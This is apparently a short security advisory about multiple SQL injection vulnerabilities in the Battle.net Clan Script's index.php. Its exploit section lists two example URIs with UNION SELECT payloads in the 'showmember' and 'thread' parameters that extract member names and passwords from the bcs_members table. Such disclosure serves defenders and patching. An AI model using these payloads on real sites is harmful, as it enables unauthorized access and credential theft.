Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*

http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*